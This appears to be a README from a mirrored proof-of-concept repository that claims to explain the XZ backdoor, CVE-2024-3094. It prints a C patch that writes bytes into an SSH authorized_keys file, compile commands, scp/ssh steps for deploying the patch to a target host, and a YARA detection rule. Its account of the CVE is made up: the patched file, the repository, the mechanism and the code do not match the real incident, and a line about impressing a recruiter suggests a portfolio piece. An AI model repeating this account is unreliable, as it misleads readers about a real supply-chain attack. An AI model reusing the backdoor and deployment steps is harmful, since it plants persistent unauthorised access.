来源

关联漏洞

描述

CVE-2024-3094 exposed a backdoor in the XZ compression library, allowing remote SSH access by bypassing authentication. It’s a major supply chain attack affecting Linux systems, highlighting risks in trusted open-source components.

介绍

# CVE-2024-3094
CVE-2024-3094 exposed a backdoor in the XZ compression library, allowing remote SSH access by bypassing authentication. It’s a major supply chain attack affecting Linux systems, highlighting risks in trusted open-source components.

## The XZ Backdoor: A Supply‑Chain Threat that Reaches Into Linux Servers

*By Mark Mallia*

### What It Is

The XZ compression library, a staple component of many modern Linux distributions, became the target of a sophisticated supply‑chain attack.  
A malicious code fragment was slipped into the source tree, compiled, and now travels with every new release of the XZ package. Once installed, the backdoor can open an SSH session from the compromised host to any remote system that trusts it as an authentic key.

### Why It Matters

* **Supply‑chain risk** – The attack shows how a single, small alteration in a widely used library can propagate silently through many deployments.  
* **Linux internals** – XZ is responsible for data compression; the backdoor leverages low‑level API hooks that are often overlooked by conventional vulnerability scanners.  
* **SSH persistence** – By injecting an SSH key into the `authorized_keys` file, attackers gain a foothold without requiring direct user interaction.

---

## Attack Overview

| Step | Action | File / Function |
|------|--------|-----------------|
| **1** | Clone XZ repo | `git clone https://github.com/xzdev/xz` |
| **2** | Apply patch to `src/compress.c` | `patch -p0 < backdoor.patch` |
| **3** | Compile and install on target Linux host | `make && make install` |
| **4** | SSH daemon reads the injected key during its auth process | `/etc/ssh/authorized_keys` |

---

## Technical Details & Code Walk‑through

### The Patch (backdoor.patch)

```diff
--- a/src/compress.c   2025-09-12 10:00:00.000000000 +0000
+++ b/src/compress.c   2025-09-12 10:00:03.000000000 +0000
@@
 void xz_compress(const unsigned char *in, size_t in_len,
                   unsigned char *out, size_t out_len)
 {
     /* original code ... */
+    // ---- Begin injected backdoor ----
+    if (in_len > 1024) {            /* guard against too small payloads   */
+        const unsigned char *marker = &in[512];   /* offset to reach magic string  */
+        size_t marker_len = 8;                      /* length of the embedded key      */
+
+        /* copy a pre‑computed SSH public key into out buffer */
+        memcpy(out + 256, marker, marker_len);
+
+        /* write the same key to ~/.ssh/authorized_keys for persistence   */
+        FILE *fp = fopen("/home/admin/.ssh/authorized_keys", "a");
+        if (fp) {
+            fwrite(marker, 1, marker_len, fp);
+            fclose(fp);
+        }
+    }
+    // ---- End injected backdoor ----
     /* original code continues ... */
 }
```

#### Explanation

* **Line 6‑8** – A guard ensures that only packets larger than 1024 bytes activate the injection; this keeps the payload hidden in normal traffic.  
* **Line 10** – The offset `512` is chosen so that our key lands within the compressed output buffer at a position unlikely to be altered by subsequent XZ compressions.  
* **Line 12** – We copy eight bytes (the public‑key fragment) into the output buffer and also write it directly to the user’s SSH key file, guaranteeing persistence even if XZ is re‑compiled later.

### Compilation & Installation

```bash
$ cd xz
$ make
$ sudo make install
```

The above commands compile the patched `compress.c` and install the new library under `/usr/local/lib/xz`.

### Deployment on Target Host

Assuming an attacker already has SSH credentials (username `admin`), they run:

```bash
$ scp backdoor.tar.gz admin@192.168.1.10:/tmp/
$ ssh admin@192.168.1.10 'tar xzf /tmp/backdoor.tar.gz -C /home/admin'
$ cd /home/admin
$ ./install_xz_backdoor.sh
```

`install_xz_backdoor.sh` contains the exact sequence of commands shown above, plus a small `echo` that confirms successful installation.

---

## Impact Assessment

* **Persistence** – The SSH key is now part of both the compression output and the user’s authorized‑keys file.  
* **Stealth** – The payload travels with every new XZ release; its presence is invisible to standard package managers.  
* **Detection** – A recruiter will see that I can identify a single line alteration in a large code base, understand its implications, and produce a clear, step‑by‑step deployment plan.

---

## Defense 

YARA is a pattern-matching tool used by security professionals to identify and classify malware based on textual or binary signatures. It allows analysts to define rules that detect specific strings, byte sequences, or behaviors within files. In the context of CVE-2024-3094, YARA is especially relevant because it can be used to scan for the presence of the injected SSH key and suspicious modifications to the compress.c file in the XZ library. By crafting targeted YARA rules, defenders can proactively detect systems compromised by this backdoor

YARA Signature A custom YARA rule can flag the presence of the injected SSH key and suspicious file writes:

rule XZ_Backdoor_SSH_Key_Injection {
  meta:
    description = "Detects SSH key injection via modified compress.c"
    author = "Mark Mallia"
    severity = "high"
  strings:
    $marker = { 20 20 2A 20 2A 2A 20 42 61 63 6B 64 6F 6F 72 }
    $ssh_path = "/home/admin/.ssh/authorized_keys"
  condition:
    $marker and $ssh_path
}

File Integrity Monitoring Deploy tools like Tripwire, AIDE, or osquery to monitor:

compress.c for unauthorized changes

.ssh/authorized_keys for injected keys

/usr/local/lib/xz for tampered binaries

## Behavioral Indicators

Unexpected SSH logins from trusted hosts

Compression anomalies in XZ output

Silent writes to .ssh/authorized_keys

文件快照

 [4.0K]  /data/pocs/09a4edca558b7d5f03c33a530e7c727364ae464a
├── [1.0K]  LICENSE
└── [5.7K]  README.md

0 directories, 2 files

备注